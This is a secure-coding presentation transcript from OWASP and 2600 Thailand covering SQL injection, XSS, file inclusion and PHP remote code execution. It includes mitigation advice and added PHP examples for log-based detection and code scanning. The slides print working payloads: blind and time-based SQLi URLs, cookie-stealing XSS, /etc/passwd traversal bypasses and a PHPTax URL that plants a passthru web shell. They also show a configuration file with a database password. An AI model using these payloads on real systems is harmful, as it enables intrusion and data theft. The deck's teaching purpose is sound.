Hack and Slash: Secure Coding

OWASP and 2600 Thailand

    Presentation Transcript

    • Hack and Slash: Secure Coding
      Krit Kadnok, Prathan Phongthiproek
    • The Most Common Vulnerabilities
      - SQL Injection
      - Cross Site Scripting (XSS)
      - File Inclusion
      - Remote Code Execution
    • SQL Injection
      - SQL Injection
      - Blind SQL Injection
    • SQL Injection (Cont.)
      If the user enters: ' UNION SELECT ALL user(), database() #
    • Blind SQL Injection
      - Normal Blind: you get TRUE/FALSE responses based on the output of the SQL query. This is a visible change in the page.
      - Totally Blind: no change in the output for a TRUE/FALSE condition.
    • Normal Blind
      Vulnerable URL:   http://site/vulnerabilities/sqli_blind/?id=1
      TRUE Response:    http://site/vulnerabilities/sqli_blind/?id=1 AND 1=1
      FALSE Response:   http://site/vulnerabilities/sqli_blind/?id=1 AND 1=2
      Check Version:
      FALSE Response:   http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=4
      TRUE Response:    http://site/vulnerabilities/sqli_blind/?id=1 AND substring(version(),1,1)=5
    • Totally Blind
      As this type gives no TRUE/FALSE response, time-based injection is needed: use IF() for the condition and BENCHMARK() for the time delay.
      Check Version:
      FALSE Response:   http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=4,BENCHMARK(5000000,MD5(CHAR(1))),null),null
      TRUE Response:    http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,BENCHMARK(5000000,MD5(CHAR(1))),null),null
      Table name guessing:
      http://site/vulnerabilities/sqli_blind/?id=1 UNION SELECT IF(SUBSTRING((select 1 from users limit 0,1),1,1)=1,BENCHMARK(5000000,MD5(CHAR(1))),null),null
    • Blind SQL Injection
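The probes described on the previous slides leave a recognisable trail in web-server logs. The following detection helper is an added example, not part of the slides: it flags the boolean pairs, the substring(version()) checks and the BENCHMARK()/SLEEP() delays in access-log lines. The log lines and the /vulnerabilities/sqli_blind/ path are constructed for the demo.

```php
<?php
// Added example (not from the slides): flag the blind-SQLi probe shapes the
// deck describes (AND n=n boolean pairs, substring(version()), BENCHMARK()/
// SLEEP() delays, UNION SELECT IF) in web-server access-log lines. The log
// lines and the /vulnerabilities/sqli_blind/ path are constructed.

const BLIND_SQLI_PATTERNS = [
    'boolean'    => '/\bAND\s+\d+\s*=\s*\d+\b/i',
    'version'    => '/\bsubstring\s*\(\s*version\s*\(\s*\)/i',
    'time_based' => '/\b(?:BENCHMARK|SLEEP)\s*\(/i',
    'union_if'   => '/\bUNION\s+SELECT\s+IF\s*\(/i',
];

/**
 * Return the names of the indicators that match one access-log line.
 * The request is URL-decoded first so %20 / %28 encodings cannot hide keywords.
 */
function blindSqliIndicators(string $logLine): array
{
    // Common Log Format: the request is the quoted "METHOD /path?query HTTP/x".
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\//', $logLine, $m)) {
        return [];
    }
    $request = urldecode($m[1]);
    $hits = [];
    foreach (BLIND_SQLI_PATTERNS as $name => $regex) {
        if (preg_match($regex, $request)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample: one normal request, then the probe shapes from the slides.
$sampleLog = [
    '10.0.0.5 - - [01/Jan/2013:10:00:01 +0700] "GET /vulnerabilities/sqli_blind/?id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2013:10:00:02 +0700] "GET /vulnerabilities/sqli_blind/?id=1%20AND%201=2 HTTP/1.1" 200 480',
    '10.0.0.5 - - [01/Jan/2013:10:00:03 +0700] "GET /vulnerabilities/sqli_blind/?id=1%20AND%20substring(version(),1,1)=5 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2013:10:00:09 +0700] "GET /vulnerabilities/sqli_blind/?id=1%20UNION%20SELECT%20IF(1=1,BENCHMARK(5000000,MD5(1)),null),null HTTP/1.1" 200 512',
];

foreach ($sampleLog as $line) {
    $hits = blindSqliIndicators($line);
    if ($hits) {
        printf("ALERT %s\n", implode(',', $hits));  // e.g. ALERT boolean
    }
}
```

A single hit is only a lead; a sequence of such requests from one client, with response sizes alternating (boolean) or response times jumping by seconds (BENCHMARK), is what distinguishes an enumeration run from a one-off.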
    • Case Study: PHD Helpdesk 2.12 SQLi Vulnerability (login.php)
    • Case Study: PHD Helpdesk 2.12 SQLi Vulnerability
      Submit POST data to login.php. Result:
    • Mitigation/Prevention Use of Prepared Statements (Parameterized Queries) Use of Stored Procedures Escaping all User Supplied Input Least Privilege White List Input Validation https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
    • Cross Site Scripting (XSS) XSS Reflected XSS Stored
    • XSS Reflected <script>alert(document.cookie)</script>
    • XSS Stored <script>alert(document.cookie)</script>
    • Mitigation/Prevention Escape Before Inserting Untrusted Data into HTMLContext Positive or “whitelist” input validation is alsorecommended Use HTTPOnly cookie flag https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
    • File Inclusion Include PHP Shell (RFI) Directory Traversal (LFI) Read Code via PHP Stream Filters (PHP://filter) Remote Code Execution (LFI to RCE) Etc
    • File Inclusion (RFI)
      RFI does not work!! allow_url_include is disabled
    • File Inclusion (LFI)
      LFI works!!
    • File Inclusion (PHP Stream)
      It works!! allow_url_include is disabled
    • File Inclusion (PHP Stream)

      <?php
      // Configuration class read back in source form through php://filter;
      // note the database credentials it exposes.
      class Configuration
      {
          public $host = "localhost";
          public $db = "cuppa";
          public $user = "root";
          public $password = "mYDb@dm1n";
          public $table_prefix = "cu_";
          public $administrator_template = "default";
          public $list_limit = 25;
          public $token = "OBqIPqlFWf3X";
          public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
          public $upload_default_path = "media/uploadsFiles";
          public $maximum_file_size = "5242880";
          public $secure_login = 0;
          public $secure_login_value = "";
          public $secure_login_redirect = "";
      }
      ?>
    • File Inclusion (LFI to RCE)
    • File Inclusion (Bypass)
      Bad Code. Bypass it!!
      - Null Byte:        ?page=../../../../../../../../../../../etc/passwd%00
      - Path Truncation:  ?page=../../../../../../../../../../../etc/passwd.............
      - Dot Truncation:   ?page=../../../../../../../../../../../etc/passwd…………….....
    • Case Study: DevalCMS 1.4a (currentfile) LFI Vulnerability
    • Case Study: DevalCMS 1.4a (currentfile) LFI Vulnerability
    • Mitigation/Prevention: Whitelist
    • Remote Code Execution Dangerous Function exec system passthru shell_exec proc_open pcntl_exec popen eval assert escapeshellcmd preg_replace call_user_func call_user_func_array Etc
    • Remote Code Execution
    • Remote Code Execution
    • Remote Code Execution (Bypass)
      PHPTax Remote Code Execution
      http://localhost/phptax/index.php?newvalue=%3C?php%20passthru%28$_GET[cmd]%29;?%3E&field=rce.php
    • Remote Code Execution
    • Remote Code Execution PHP-Charts 1.0 (type) RCE Vulnerability
    • Remote Code Execution PHP-Charts 1.0 (type) RCE Vulnerability
    • Mitigation/Prevention Ensure that user input is properly validated Limit the use of dynamic inputs from users tovulnerable functions Build a whitelist for positive file names and code withregular expressions (e.g. Alphanumeric only) orarrays. Do not try to blacklist for evil PHP code
    • Bug Hunting!!
      - Code Review
      - Scan for potentially vulnerable functions
      - Trace back their parameters
      Free Tool!! >> http://sourceforge.net/projects/rips-scanner/
    • RIPS
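The scan-then-trace-back idea of the Bug Hunting slide in miniature, as an added example that is neither part of the slides nor RIPS itself: it tokenises PHP source, looks for the dangerous functions listed in the deck, and reports the calls whose arguments come from a request superglobal either directly or through one assignment. The scanned snippet is constructed.

```php
<?php
// Added example (not from the slides, and not RIPS): a small code-review helper
// that scans PHP source for the dangerous functions listed in the deck and reports
// calls whose arguments come from a request superglobal, directly or via one
// assignment. The scanned snippet is constructed.
const DANGEROUS = ['exec', 'system', 'passthru', 'shell_exec', 'proc_open', 'pcntl_exec',
    'popen', 'assert', 'preg_replace', 'call_user_func', 'call_user_func_array'];
const CONSTRUCTS = [T_EVAL, T_INCLUDE, T_INCLUDE_ONCE, T_REQUIRE, T_REQUIRE_ONCE];

/** Return [line => message] for each dangerous call fed by user-controlled data. */
function scanDangerousCalls(string $source): array
{
    $tokens   = token_get_all($source);
    $tainted  = ['$_GET', '$_POST', '$_REQUEST', '$_COOKIE'];  // grows with assigned variables
    $findings = [];
    $isTainted = function (string $s) use (&$tainted): bool {   // substring match: $file also hits $filename
        foreach ($tainted as $needle) if (strpos($s, $needle) !== false) return true;
        return false;
    };
    foreach ($tokens as $i => $t) {
        if (!is_array($t)) continue;
        [$id, $text, $line] = $t;
        // Text of the rest of this statement, up to the next ';'.
        $stmt = '';
        for ($j = $i + 1, $n = count($tokens); $j < $n && $tokens[$j] !== ';'; $j++) {
            $stmt .= is_array($tokens[$j]) ? $tokens[$j][1] : $tokens[$j];
        }
        // One-level trace back: "$x = <expr using tainted data>;" taints $x.
        if ($id === T_VARIABLE && preg_match('/^\s*=[^=]/', $stmt) && $isTainted($stmt)) {
            $tainted[] = $text;
            continue;
        }
        $isCall = ($id === T_STRING && in_array(strtolower($text), DANGEROUS, true))
               || in_array($id, CONSTRUCTS, true);
        if ($isCall && $isTainted($stmt)) {
            $findings[$line] = strtolower($text) . '(...) receives user-controlled data';
        }
    }
    return $findings;
}

$snippet = <<<'PHP'
<?php
$file = $_GET['page'];
include $file . '.php';
passthru('ls ' . $_GET['dir']);
system('uptime');
PHP;
foreach (scanDangerousCalls($snippet) as $line => $msg) {
    echo "line $line: $msg\n";   // reports lines 3 and 4, not the fixed-string system() call
}
```

Each finding is a starting point for manual review, which is the workflow the slide describes; a real scanner such as RIPS also follows taint across functions and files and knows which sanitisers clear it.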
    • Visit => http://www.owasp.org
    • References
      http://www.websec.ca/kb/sql_injection
      https://www.owasp.org/index.php/SQL_Injection
      https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
      https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
      https://www.owasp.org/index.php/PHP_File_Inclusion
      https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
      http://www.exploit-db.com
      http://sourceforge.net/projects/rips-scanner
    • If someone is still in the room.. THANK YOU